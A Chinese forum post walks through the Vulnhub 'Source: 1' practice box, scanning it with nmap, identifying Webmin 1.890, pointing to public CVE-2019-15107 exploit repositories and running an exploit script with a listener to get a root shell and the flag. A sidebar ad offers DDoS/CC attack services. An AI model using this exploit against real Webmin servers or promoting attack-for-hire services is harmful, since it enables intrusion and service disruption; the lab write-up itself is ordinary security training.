登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
导读
排行榜
资讯
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
写博客
小组
VIP申请
VIP网盘
网盘
联系我们
发帖说明
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
业界区
›
业界
›
Vulnhub-Source-1(CVE-2019-15107)
Vulnhub-Source-1(CVE-2019-15107)
[ 复制链接 ]
各卧唯
2025-6-4 21:39:19
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
一、靶机搭建
选择打开选项
选中下载的ova文件,然后导入选择一个存放路径即可
如果遇到不兼容的情况,可以打开
.vmx
修改,改为和虚拟机一个版本号
二、信息收集
官方信息
Name: Source: 1
Date release: 17 Jul 2020
难度:初级
描述:为 AttackerKB 聊天室创建的简单 CTF 盒子。这是练习的独立版本。这个框可能会出现在供应链攻击的后续房间里,因为它是一个很好的最新例子。
复制代码
扫ip
靶机ip:
192.168.108.154
扫开放服务和端口
开放了
22和10000
端口
指纹探测
nmap 192.168.108.154 -p 22,10000 -sV -sC -O --version-all
复制代码
没什么可以利用的信息,看到
10000
端口版本信息,
MiniServ 1.890
(Webmin httpd)
目录扫描
dirsearch
扫描看看,扫不出来
dirb
扫描,无结果
三、Web渗渗透
访问
10000
端口,是一个登录网站,源码和指纹信息都没有什么利用点
想到刚才找到的网站版本号,查找一下历史漏洞
下载下来查看一下,需要结合
msf
才能使用
CVE-2019-15107-Webmin远程命令执行漏洞
上网搜一下看看,存在漏洞,参考文章:
https://github.com/squid22/Webmin_CVE-2019-15107
https://github.com/jas502n/CVE-2019-15107?tab=readme-ov-file
复制代码
下载exp到kali
四、提权
赋予权限
开启监听端口,并执行脚本
./webmin_exploit.py 192.168.108.154 10000 192.168.108.130 4444
复制代码
拿到root权限
在跟目录下发现
flag
flag:
THM{UPDATE_YOUR_INSTALL}
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
Vulnhub
Source
CVE
2019
15107
相关帖子
vulnhub靶机:GoldenEye-v1
Struts2 S2-066(CVE-2023-50164)漏洞复现
从3亿到48亿:NuGet周下载量跃迁背后的.NET生态演进与未来挑战(2019-2025)
PWN手成长之路-06-watevr_2019_voting_machine_1-栈溢出+劫持
Easysearch 字段'隐身'之谜:source_reuse 与 ignore_above 的陷阱解析
PWN手的成长之路-14-ciscn_2019_c_1-ret2libc
PWN手的成长之路-06-watevr_2019_voting_machine_1-栈溢出+劫持
CVE-2025-50817(Python-future:test.py 未预期导入导致任意代码执行)
洛谷 P5658 [CSP-S 2019] 括号树 题解
SQLServer 2019 标准版在虚拟机上无法充分利用CPU的问题诊断
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
业界
vulnhub靶机:GoldenEye-v1
3
925
伏滢
2025-09-20
安全
Struts2 S2-066(CVE-2023-50164)漏洞复现
1
203
蓝娅萍
2025-09-26
业界
从3亿到48亿:NuGet周下载量跃迁背后的.NET生态演进与未来挑战(2019-2025)
3
472
阜逐忍
2025-10-01
安全
PWN手成长之路-06-watevr_2019_voting_machine_1-栈溢出+劫持
1
420
何玲
2025-10-05
安全
Easysearch 字段'隐身'之谜:source_reuse 与 ignore_above 的陷阱解析
4
980
貊淀
2025-10-08
业界
PWN手的成长之路-14-ciscn_2019_c_1-ret2libc
2
905
胆饬
2025-10-12
安全
PWN手的成长之路-06-watevr_2019_voting_machine_1-栈溢出+劫持
2
299
浦乐
2025-10-22
安全
CVE-2025-50817(Python-future:test.py 未预期导入导致任意代码执行)
2
269
陶田田
2025-11-01
业界
洛谷 P5658 [CSP-S 2019] 括号树 题解
0
790
拴茅劾
2025-11-22
安全
SQLServer 2019 标准版在虚拟机上无法充分利用CPU的问题诊断
0
742
趣侮
2025-12-13
回复
(1)
锑砖
2025-11-30 16:16:00
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
谢谢楼主提供!
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
浏览过的版块
科技
安全
签约作者
程序园优秀签约作者
发帖
各卧唯
2025-11-30 16:16:00
关注
0
粉丝关注
21
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
anyue1937
9994893
kk14977
6845356
3934307807
991123
4
xiangqian
638210
5
韶又彤
9999
6
宋子
9984
7
闰咄阅
9993
8
刎唇
9993
9
俞瑛瑶
9998
10
蓬森莉
9951
查看更多
今日好文热榜
692
用 GPT-5.2 Vibe Coding,做了一个可以“玩
931
上海专业防水补漏服务:国家一级资质,免费
349
基于深度学习的无人机视角检测系统演示与介
765
读书笔记 XILINX ug1137-Zynq UltraScale+
123
DBeaver 与 Excel JDBC 驱动(xlSql)使用说
928
【节点】[Adjustment-InvertColors节点]原
716
笔记 XILINX ug1085-Zynq UltraScale+ Devi
446
笔记 XILINX ug1085-Zynq UltraScale+ Devi
720
读书笔记 XILINX ug1085-Zynq UltraScale+
896
基于深度学习的船舶检测系统演示与介绍
435
吴恩达深度学习课程四:计算机视觉
786
报错“Message: session not created: prob
996
基于深度学习的遥感地面物体检测系统演示与
574
时序数据库 IoTDB Committer:不用等自己足
184
南京医科大学黄伯贤教授团队多组学构建胎儿
772
如何使用 vxe-gantt table 甘特图来实现多
858
OpenCVSharp:学习最佳匹配矩形检测
122
题解 SP10366 CODEIT03 - Play with Dates
777
Avalonia:辨析 UserControl 与 TemplatedC
83
我们提供了这些企业和开发者所需的热门技术